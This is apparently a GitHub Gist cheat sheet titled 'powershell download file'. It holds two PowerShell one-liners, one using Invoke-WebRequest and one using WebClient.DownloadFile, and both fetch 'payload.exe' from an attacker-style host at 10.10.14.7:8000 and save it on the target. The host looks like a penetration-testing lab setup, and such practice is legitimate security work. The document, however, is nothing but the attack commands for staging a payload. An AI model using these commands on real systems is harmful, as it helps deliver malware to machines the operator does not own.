Created
February 9, 2022 17:03
-
-
Save shollingsworth/5732694b25dab58918c8eaeca34bc0b5 to your computer and use it in GitHub Desktop.
powershell download file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell "Invoke-WebRequest -Uri http://10.10.14.7:8000/payload.exe -OutFile payload.exe -UseBasicParsing" | |
| powershell "(new-object System.Net.Webclient).Downloadfile('http://10.10.14.7:8000/payload.exe', 'payload.exe')" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment